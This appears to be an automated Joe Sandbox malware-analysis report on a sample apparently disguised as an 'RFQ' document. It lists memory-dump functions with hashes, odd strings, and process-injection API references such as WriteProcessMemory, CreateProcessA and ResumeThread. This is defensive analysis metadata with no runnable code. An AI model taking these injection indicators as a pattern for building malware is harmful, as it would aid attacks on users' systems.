Snapshot File: hcaresult_3_2_74a0000_RFQ_43200046412000086500125.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 868d2b9985b7ea36436a31e4557c75012702afc7f3ec9eda65f14ab2bd0e8899
Instruction ID: fede5f34465de3e1c134d526bcfe5fd716669c5ae084d68309df197429566a7b
Opcode Fuzzy Hash: 868d2b9985b7ea36436a31e4557c75012702afc7f3ec9eda65f14ab2bd0e8899
Instruction Fuzzy Hash: 4031AAB5D012589FCB10CFA9D980ADEFBF4BB49320F20942AE815B7310C734A946CF94

Function 09872590 Relevance: 1.6, Strings: 1, Instructions: 308COMMON

Download Yara Rule

Strings

PH^q, xrefs: 09872914

Memory Dump Source

Source File: 00000003.00000002.2044693538.0000000009870000.00000040.00000800.00020000.00000000.sdmp, Offset: 09870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9870000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID: PH^q
API String ID: 0-2549759414
Opcode ID: a1098f37a29bb45ac923bed03f467804f94e2cf07d8459e31b8999e50f9a314f
Instruction ID: 631f76ad25d94ae362d490ac42406f464f24cf5d0d5af93f4665755a9c98155c
Opcode Fuzzy Hash: a1098f37a29bb45ac923bed03f467804f94e2cf07d8459e31b8999e50f9a314f
Instruction Fuzzy Hash: 44D1D174E05318DFDB24CFA9C984BA9FBB2BB89308F1490A9D529E7354DB709985CF01

Function 0987257F Relevance: 1.5, Strings: 1, Instructions: 298COMMON

Download Yara Rule

Strings

PH^q, xrefs: 09872914

Memory Dump Source

Source File: 00000003.00000002.2044693538.0000000009870000.00000040.00000800.00020000.00000000.sdmp, Offset: 09870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9870000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID: PH^q
API String ID: 0-2549759414
Opcode ID: 88dd23bb522511874ff22ffe62b25d9d675e4500c8d7947f4ab943d9c3515ed7
Instruction ID: 1f554ec7b3097ef9e80aa86389e25b2d7c0d020355e483405a0577786884eb79
Opcode Fuzzy Hash: 88dd23bb522511874ff22ffe62b25d9d675e4500c8d7947f4ab943d9c3515ed7
Instruction Fuzzy Hash: 91D1D074E01218DFDB64CFA9C985BAAFBF2BB89308F1490A9D429E7354D7709985CF01

Function 099419A3 Relevance: .5, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2044885753.0000000009940000.00000040.00000800.00020000.00000000.sdmp, Offset: 09940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9940000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a64e78031b441820f32a8ee1e25a666fffce94ac5eac64a326cf36bb9b446a44
Instruction ID: 73492efea2b6a1848ce2acb7565a653a45acd737b7698d5f5339ec17c71cc6b1
Opcode Fuzzy Hash: a64e78031b441820f32a8ee1e25a666fffce94ac5eac64a326cf36bb9b446a44
Instruction Fuzzy Hash: 2D52B5B4A042288FCB65DF28C984B9ABBB6FB89305F1081D5D90DA7355DB30AE85CF51

Function 074A26C8 Relevance: .2, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2036711409.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_74a0000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4a4e90b753a693105fcc4809500424ea322b5ba717754ffab5dc1a59e7e3770
Instruction ID: 692ee745a0acc53c758a4eec71cf6bddbe34db851b9fbe52e5dacb1d7ffe466e
Opcode Fuzzy Hash: e4a4e90b753a693105fcc4809500424ea322b5ba717754ffab5dc1a59e7e3770
Instruction Fuzzy Hash: 2A8147B4E05218DFDB14CF99D940BEDBBF2BB9A304F1080AAD409AB394DB745A85DF10

Function 074A26D8 Relevance: .2, Instructions: 192COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2036711409.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_74a0000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8dc11ae95d73332d7bb80879fdb93a447ebe80a65dba70d2ffa509d29da00808
Instruction ID: eb524d5525afe871e02e94610d98ed2b475f793f6f11c45eba414a1efb85239c
Opcode Fuzzy Hash: 8dc11ae95d73332d7bb80879fdb93a447ebe80a65dba70d2ffa509d29da00808
Instruction Fuzzy Hash: 0F8148B8E05218DFDB14CF99D540BEDBBF2BB9A304F0090AAD409AB394DB745A85DF10

Function 09940006 Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2044885753.0000000009940000.00000040.00000800.00020000.00000000.sdmp, Offset: 09940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9940000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8ddb30439cdcf9c8892aeaa7e1e797c074f0d3c6b00647e78d3779e495d7d58
Instruction ID: 990857f7569e77046ebb76ad7a22b5a9a6fd58fbb1c1cea6afa07a87aa648b13
Opcode Fuzzy Hash: b8ddb30439cdcf9c8892aeaa7e1e797c074f0d3c6b00647e78d3779e495d7d58
Instruction Fuzzy Hash: 70612A71E05A588BDB19CF6BDC4068ABFF3AFC9305F18C0AAD508AB265DB341985CF51

Function 07CA2350 Relevance: 11.8, Strings: 9, Instructions: 544COMMON

Download Yara Rule

Strings

$^q, xrefs: 07CA26C1
4'^q, xrefs: 07CA24C5
4'^q, xrefs: 07CA24BB
4'^q, xrefs: 07CA274A
4'^q, xrefs: 07CA273E
p<^q, xrefs: 07CA28AB
$^q, xrefs: 07CA271C
$^q, xrefs: 07CA270C
p<^q, xrefs: 07CA289F

Memory Dump Source

Source File: 00000003.00000002.2039183244.0000000007CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ca0000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$p<^q$p<^q$$^q$$^q$$^q
API String ID: 0-3172493745
Opcode ID: dfe3fc2c14d90b5b5b8d3419b95086328dff11b65d135a7ff2fa161146e1536c
Instruction ID: 4aec82f2e7fd9ea6c484da0b3f4e2fb409d536b60ce79c4b9e0a71ca278e7fa7
Opcode Fuzzy Hash: dfe3fc2c14d90b5b5b8d3419b95086328dff11b65d135a7ff2fa161146e1536c
Instruction Fuzzy Hash: C41248B1B0422BAFCB15CF29C994AAA7BF1BFC521AF1484A6D405CF261DB31CA45C791

Function 07CA0428 Relevance: 10.3, Strings: 8, Instructions: 315
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

`Bbk, xrefs: 07CA077B
4'^q, xrefs: 07CA04F5
4'^q, xrefs: 07CA0501
$^q, xrefs: 07CA0659
4'^q, xrefs: 07CA0677
4'^q, xrefs: 07CA0683
$^q, xrefs: 07CA061F
$^q, xrefs: 07CA064D

Memory Dump Source

Source File: 00000003.00000002.2039183244.0000000007CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ca0000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$`Bbk$$^q$$^q$$^q
API String ID: 0-3069137555
Opcode ID: 4b028e0c6cd07f20c1d9ab1f92ad633fbca1c2eea2f7ad99c25178e0b895bdb7
Instruction ID: 96657faa949c91c768531bdd40f53f67b14b92951393fc86ceec3a001164deed
Opcode Fuzzy Hash: 4b028e0c6cd07f20c1d9ab1f92ad633fbca1c2eea2f7ad99c25178e0b895bdb7
Instruction Fuzzy Hash: AAA13CB1B04207AFCF254B6998447BABBE1AFC525AF14847BD805CB251FB32C9C5CB91

Function 07CA1E48 Relevance: 7.9, Strings: 6, Instructions: 391
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'^q, xrefs: 07CA1F05
4'^q, xrefs: 07CA1EF9
4'^q, xrefs: 07CA2282
4'^q, xrefs: 07CA20EB
4'^q, xrefs: 07CA20F7
4'^q, xrefs: 07CA228E

Memory Dump Source

Source File: 00000003.00000002.2039183244.0000000007CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ca0000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
API String ID: 0-2822668367
Opcode ID: 2e36ff7f524d029ae4e48811ab0ffe443275127693fde94661fe225c65998327
Instruction ID: 32db16950b010ef486719aa289bc85a2a0501145d2d48fd56e081b86b960b4ce
Opcode Fuzzy Hash: 2e36ff7f524d029ae4e48811ab0ffe443275127693fde94661fe225c65998327
Instruction Fuzzy Hash: 7EC16BB1B0421BDFCB148B69C8842AABBF2BFC5226F18C1BAC505CB255EB31C945C751

Function 09931C20 Relevance: 6.6, Strings: 5, Instructions: 350
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(bq, xrefs: 09931F69
(bq, xrefs: 09931D34
(bq, xrefs: 09931D8A
(bq, xrefs: 09931E42
(bq, xrefs: 09931E6D

Memory Dump Source

Source File: 00000003.00000002.2044813173.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9930000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID: (bq$(bq$(bq$(bq$(bq
API String ID: 0-2298650571
Opcode ID: f8dfa464195414d9eb01cc5feb870ba547f60591774a774127a5efe21f2342cb
Instruction ID: 356ebd22d437c0d3087c206b2cd4842e2b293812665df37d6d687acb7b43684c
Opcode Fuzzy Hash: f8dfa464195414d9eb01cc5feb870ba547f60591774a774127a5efe21f2342cb
Instruction Fuzzy Hash: 71C1D1313082949FDB259F79D8506AE7BE6EFC5310B1485AAE845CB3A2CF35DC06C7A1

Function 07CA0CF8 Relevance: 6.4, Strings: 5, Instructions: 137
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 07CA0D88
4'^q, xrefs: 07CA0E07
$^q, xrefs: 07CA0DDF
4'^q, xrefs: 07CA0DFB
$^q, xrefs: 07CA0DD3

Memory Dump Source

Source File: 00000003.00000002.2039183244.0000000007CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ca0000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q$$^q
API String ID: 0-3272787073
Opcode ID: e4b052e2641a0d728f34efd3d1d10bf7af6b64e10c4a0571ded6f4bd4efc12ed
Instruction ID: a966bec491ae1993f395438331243a89681cb1ec3d2094b6944a1e87ab50d09c
Opcode Fuzzy Hash: e4b052e2641a0d728f34efd3d1d10bf7af6b64e10c4a0571ded6f4bd4efc12ed
Instruction Fuzzy Hash: CF416CB2B0020BEFCB244A2598447BA7BE5AF9128AF10846AD845CB251FB31DAC5D761

Function 09A26D89 Relevance: 5.3, Strings: 4, Instructions: 263
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 09A26AAE
#, xrefs: 09A26C1A
(, xrefs: 09A26D75
$, xrefs: 09A26C56

Memory Dump Source

Source File: 00000003.00000002.2045340125.0000000009A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9a20000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID: $#$$$(
API String ID: 0-2630118175
Opcode ID: a62857ed71384e730dad4ab53660cd5e35aa09d6b874ff0af2e10bb1f4ed6c42
Instruction ID: 85ec57ee0fdd5e8ce2e1f3e00d6fe571db656545ab9937f4eb721c1d90fd87d9
Opcode Fuzzy Hash: a62857ed71384e730dad4ab53660cd5e35aa09d6b874ff0af2e10bb1f4ed6c42
Instruction Fuzzy Hash: 3AC15A74A46328CFEB20CF68D985BEDBBF2FB49704F2091AAD509A7291C7745985CF01

Function 09933B10 Relevance: 4.2, Strings: 3, Instructions: 483
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hbq, xrefs: 09933FF7
Hbq, xrefs: 09934029
Hbq, xrefs: 09934079

Memory Dump Source

Source File: 00000003.00000002.2044813173.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9930000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID: Hbq$Hbq$Hbq
API String ID: 0-2297679979
Opcode ID: 267cdfd598fddf550e1ea8b6d971f576c8f0b762932be48ac29b1c908f881156
Instruction ID: f94a0a3ad3954275515461d604b3f88d06e6067f635c00f41da0a760f3991488
Opcode Fuzzy Hash: 267cdfd598fddf550e1ea8b6d971f576c8f0b762932be48ac29b1c908f881156
Instruction Fuzzy Hash: 45124930A00244DFDB24DFA9C885A6EBBF6FF88304F54852DE5469B3A5DB31AC46CB51

Function 09935840 Relevance: 4.1, Strings: 3, Instructions: 370
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'^q, xrefs: 09935BB9
4'^q, xrefs: 09935A5A
4'^q, xrefs: 09935B39

Memory Dump Source

Source File: 00000003.00000002.2044813173.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9930000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q
API String ID: 0-1196845430
Opcode ID: 53d60edcb34d6119ef12850c1a96da78ee95ce36e834dfeaca23bd2073202fdb
Instruction ID: f5d54a0be5750920e5126cebebab6c1ca580cf1bf9f113a17da5bf5c72cd2ba2
Opcode Fuzzy Hash: 53d60edcb34d6119ef12850c1a96da78ee95ce36e834dfeaca23bd2073202fdb
Instruction Fuzzy Hash: BFF1ED34A10118DFCB04DFA4D998A9DB7B2FF89304F558159E90AAB3A5DB71EC42CF81

Function 0993A220 Relevance: 4.1, Strings: 3, Instructions: 360
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(bq, xrefs: 0993A374
(bq, xrefs: 0993A349
Hbq, xrefs: 0993A39F

Memory Dump Source

Source File: 00000003.00000002.2044813173.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9930000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID: (bq$(bq$Hbq
API String ID: 0-2835675688
Opcode ID: 8bf14079331fef3b28dba78ec555a6672b572286509f4f6bc1a4d18de3020bb9
Instruction ID: 94f502e8578ae0b325652317c8a1b7a3453c7c09668302aee5d80aff06242fa1
Opcode Fuzzy Hash: 8bf14079331fef3b28dba78ec555a6672b572286509f4f6bc1a4d18de3020bb9
Instruction Fuzzy Hash: B3E13034A01209DFCB04EF64D594AAEBBB6FF89300F51C569E845AB364DB31EC85CB91

Function 09A2702E Relevance: 4.0, Strings: 3, Instructions: 237
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 09A26AAE
(, xrefs: 09A26D75
$, xrefs: 09A26C56

Memory Dump Source

Source File: 00000003.00000002.2045340125.0000000009A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9a20000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID: $$$(
API String ID: 0-3551151888
Opcode ID: 9829dfb049803d1e43f74dd54742d4f6da89797677d4fda6eb68355c8e60d74e
Instruction ID: 44839855f3e06e3d017b1cca7bc8c0c20e0300681d90ff19d5d1a8f5128f0f7e
Opcode Fuzzy Hash: 9829dfb049803d1e43f74dd54742d4f6da89797677d4fda6eb68355c8e60d74e
Instruction Fuzzy Hash: 3DB15A70946328CFEB20CF68D985BEDBBF2FB49704F2091AAD509A7295CB745985CF01

Function 07CA0CD7 Relevance: 3.8, Strings: 3, Instructions: 98
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 07CA0D88
4'^q, xrefs: 07CA0DFB
$^q, xrefs: 07CA0DD3

Memory Dump Source

Source File: 00000003.00000002.2039183244.0000000007CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ca0000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID: 4'^q$$^q$$^q
API String ID: 0-2291298209
Opcode ID: 359920217408c189b6de995f48c6056dcae03ddc0f3082669f03dff3db41e893
Instruction ID: 8163e6cae3600e7228a68e2af57e1c4d0acd7d33b53382adc7a17959896097ec
Opcode Fuzzy Hash: 359920217408c189b6de995f48c6056dcae03ddc0f3082669f03dff3db41e893
Instruction Fuzzy Hash: E5313CF2A0430BBFDB314F1589807BA7BB59F522DAF04006AC8448B192F735DAC5D7A1

Function 07CA05C8 Relevance: 3.8, Strings: 3, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'^q, xrefs: 07CA0677
$^q, xrefs: 07CA061F
$^q, xrefs: 07CA064D

Memory Dump Source

Source File: 00000003.00000002.2039183244.0000000007CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ca0000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID: 4'^q$$^q$$^q
API String ID: 0-2291298209
Opcode ID: 45e4e3374722b48563987ab7feac15443060fcd6400b28b5b3e12d13af8e6a29
Instruction ID: c180e2ebfc2929b4cec427ac56bcff4d5b211fa2b47b9f6ab9fa57db818a3762
Opcode Fuzzy Hash: 45e4e3374722b48563987ab7feac15443060fcd6400b28b5b3e12d13af8e6a29
Instruction Fuzzy Hash: C31160F1F0030BEBDB248E15C584BAAB7B4ABC469EF15802ADC048A101F732C6D5CB61

Function 07CA6B70 Relevance: 2.9, Strings: 2, Instructions: 362COMMON

Download Yara Rule

Strings

4'^q, xrefs: 07CA7016
4'^q, xrefs: 07CA7006

Memory Dump Source

Source File: 00000003.00000002.2039183244.0000000007CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ca0000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: 7d0b99eb8ce6366f79bab7a3261371c5614e0211a6cde358f7d124d8c91c04ea
Instruction ID: ddb9e9f5be6f5814e470acaac52b3e179e94d6143615d61c4045b4cde621cbfc
Opcode Fuzzy Hash: 7d0b99eb8ce6366f79bab7a3261371c5614e0211a6cde358f7d124d8c91c04ea
Instruction Fuzzy Hash: C5F1D6B4D0124AEFCB54DFA5E8986ACBBB2FF8931AF148429E506A7350DB355D85CF00

Function 09933608 Relevance: 2.8, Strings: 2, Instructions: 345COMMON

Download Yara Rule

Strings

(bq, xrefs: 0993361C
d, xrefs: 09933868

Memory Dump Source

Source File: 00000003.00000002.2044813173.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9930000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID: (bq$d
API String ID: 0-3334038649
Opcode ID: 5d69266d6aa110b170491a5f1a4c2405c4081c8267f8fbb246111364a7a3e688
Instruction ID: 53ce2912999def5e373ea74cff83bdbddb2af2fa19f18308d8a7bfa9bbc0d496
Opcode Fuzzy Hash: 5d69266d6aa110b170491a5f1a4c2405c4081c8267f8fbb246111364a7a3e688
Instruction Fuzzy Hash: 84D17C34600606CFCB14CF29C48596ABBF6FF88315B95CA69E45A8B761DB30FC45CB90

Function 09931380 Relevance: 2.7, Strings: 2, Instructions: 246COMMON

Download Yara Rule

Strings

(_^q, xrefs: 09931B4B
Pl^q, xrefs: 09931577

Memory Dump Source

Source File: 00000003.00000002.2044813173.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9930000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID: (_^q$Pl^q
API String ID: 0-1560878243
Opcode ID: 94d78c6575a753f12d0e7359f05abd1c41e7c3a0f96287fb26f7257541110474
Instruction ID: 3f64895c6ae277fc6fa81314dd6b2b05e8ef2bec48949d7d1785f87ea96a25ae
Opcode Fuzzy Hash: 94d78c6575a753f12d0e7359f05abd1c41e7c3a0f96287fb26f7257541110474
Instruction Fuzzy Hash: B7912634B401148FCB14DF69C484AAA7BFABF89710F5580A9E505CB3B5DB71EC42CB91

Function 0993C578 Relevance: 2.6, Strings: 2, Instructions: 145COMMON

Download Yara Rule

Strings

(bq, xrefs: 0993C5C6
Hbq, xrefs: 0993C69C

Memory Dump Source

Source File: 00000003.00000002.2044813173.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9930000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID: (bq$Hbq
API String ID: 0-4081012451
Opcode ID: 05c1827ec16302282a013fd41a266f27d50ea45079e139c79ecd4d05faaacc9d
Instruction ID: f29b8e10a98b94ba9f71a7b58d2532c6b2ee6b5d391101a9571d4c1bf69e9b66
Opcode Fuzzy Hash: 05c1827ec16302282a013fd41a266f27d50ea45079e139c79ecd4d05faaacc9d
Instruction Fuzzy Hash: BD41F1347086508FC705AF38C810A2E7BF6AFC6314B55C4AAE545DB3A2DE35DC06CB95

Function 07CA0240 Relevance: 2.6, Strings: 2, Instructions: 113COMMON

Download Yara Rule

Strings

4'^q, xrefs: 07CA0355
4'^q, xrefs: 07CA0361

Memory Dump Source

Source File: 00000003.00000002.2039183244.0000000007CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ca0000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: 3559a028411df5ab0b2abfc3af70e8b5bf613877f4cb9afa3e32565a446a7bb2
Instruction ID: 4227f48505c5ebd13a716efeca49423b0c00c3f6f1775c8cb7bf6edb748c880e
Opcode Fuzzy Hash: 3559a028411df5ab0b2abfc3af70e8b5bf613877f4cb9afa3e32565a446a7bb2
Instruction Fuzzy Hash: FF3169B1F42217AFCB24567896501BEB3D1AFC129AF10847AC902CB340FE36CAC5C791

Function 074A9DC4 Relevance: 2.6, APIs: 1, Instructions: 1107injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 074AA2AB

Memory Dump Source

Source File: 00000003.00000002.2036711409.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_74a0000_RFQ_43200046412000086500125.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 98a1f3a7973d4e42b06e6b31df5a17e161ed645b4f1eae743aa2d3e5cb7cb6f0
Instruction ID: c6fe3cd81f633b14453655d90484ae4b7d8aadc025f7febf8c2115341a311927
Opcode Fuzzy Hash: 98a1f3a7973d4e42b06e6b31df5a17e161ed645b4f1eae743aa2d3e5cb7cb6f0
Instruction Fuzzy Hash: EE9147B4D093999FCB02CFA8C4946DEBFF1EF5A300F1480AAD054AB261D7386955CB64

Function 0994D486 Relevance: 2.5, Strings: 2, Instructions: 36COMMON

Download Yara Rule

Strings

., xrefs: 0994D665
4, xrefs: 0994D498

Memory Dump Source

Source File: 00000003.00000002.2044885753.0000000009940000.00000040.00000800.00020000.00000000.sdmp, Offset: 09940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9940000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID: .$4
API String ID: 0-500082667
Opcode ID: de231da2f462fb3183b55e8e9da4cefd94a440a9938d91b6eb190da19ba6deb3
Instruction ID: 3aebcf452ecad8c94d374390c32be267b3f2cd667d624623366a7d407c4750d7
Opcode Fuzzy Hash: de231da2f462fb3183b55e8e9da4cefd94a440a9938d91b6eb190da19ba6deb3
Instruction Fuzzy Hash: 30119E78A01228CFDB51CF18D888FA8B7F2BB08304F509595E809E7391D775AA84CF51

Function 09A27B35 Relevance: 2.5, Strings: 2, Instructions: 21COMMON

Download Yara Rule

Strings

#, xrefs: 09A27B94
TJcq, xrefs: 09A27B66

Memory Dump Source

Source File: 00000003.00000002.2045340125.0000000009A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9a20000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID: #$TJcq
API String ID: 0-1410053842
Opcode ID: 2130e7c61f827c98fe31dc0408dc0d3097e3f1dfa99e300896e4c5f84bb330ff
Instruction ID: b0d49da88080b5f542437cdd4a13eba865fbcfa14c4bf83a6fb344cf04a8d8c9
Opcode Fuzzy Hash: 2130e7c61f827c98fe31dc0408dc0d3097e3f1dfa99e300896e4c5f84bb330ff
Instruction Fuzzy Hash: 96F06274D051288FDB60DF64D849B8DBBB2FB89315F1090DAC80DA7355DB306E858F55

Function 09936720 Relevance: 1.9, Strings: 1, Instructions: 677COMMON

Download Yara Rule

Strings

,bq, xrefs: 09936A9B

Memory Dump Source

Source File: 00000003.00000002.2044813173.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9930000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID: ,bq
API String ID: 0-2474004448
Opcode ID: 57315c84140447724a9aba38aa093d11e5e9d31591e215a676bda864ee865beb
Instruction ID: 55b6f2498b79b64cca25a575666558a6ee5dfba5559554f58312fb28a5462453
Opcode Fuzzy Hash: 57315c84140447724a9aba38aa093d11e5e9d31591e215a676bda864ee865beb
Instruction Fuzzy Hash: E3522875A002289FDB64CF68C945BEDBBF6BB88300F5580D9E549EB361DA319D80CF61

Function 09930BF8 Relevance: 1.8, Strings: 1, Instructions: 536COMMON

Download Yara Rule

Strings

(_^q, xrefs: 09930E85

Memory Dump Source

Source File: 00000003.00000002.2044813173.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9930000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID: (_^q
API String ID: 0-538443824
Opcode ID: 39003796a1f4ecc9d32fb2728dcbe687efb6aeef32a7b3307dafc4b230c5a827
Instruction ID: 61a2cc75ba8b1ea973cb09d0264acd653604d28db7eea9fb9aa648cb71224a88
Opcode Fuzzy Hash: 39003796a1f4ecc9d32fb2728dcbe687efb6aeef32a7b3307dafc4b230c5a827
Instruction Fuzzy Hash: AB226935A002189FDB24CFA9D494AADB7F6FF88314F558469E905EB3A1CB71EC41CB90

Function 074A7676 Relevance: 1.8, APIs: 1, Instructions: 262processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 074A78DF

Memory Dump Source

Source File: 00000003.00000002.2036711409.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_74a0000_RFQ_43200046412000086500125.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: d028490173606d2a36e95a47a1255d747d0702f049954d5f7fe72d4e1f86d3ff
Instruction ID: 6ba4a1f193673f5c5cc1da8e287ad3cb14ce0127819b8bfbd544ce7f3af86b6e
Opcode Fuzzy Hash: d028490173606d2a36e95a47a1255d747d0702f049954d5f7fe72d4e1f86d3ff
Instruction Fuzzy Hash: 06A114B4D00219DFDB21CFA8C841BEEBBF1BF59300F14916AE858A7250DB749985CF85

Function 074A7678 Relevance: 1.8, APIs: 1, Instructions: 261processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 074A78DF

Memory Dump Source

Source File: 00000003.00000002.2036711409.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_74a0000_RFQ_43200046412000086500125.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: a6ff55df48025758972044f820c8f344d242bcf4c008a6f2324c038bc0a141fd
Instruction ID: 15126a95871678b6c793d82557d20300b4186766ae4cd2a56fb3da0e3fadb0dc
Opcode Fuzzy Hash: a6ff55df48025758972044f820c8f344d242bcf4c008a6f2324c038bc0a141fd
Instruction Fuzzy Hash: F6A124B4D00219DFDB21CFA9C841BEEBBF1BF59310F14916AE858A7240DB749985CF85

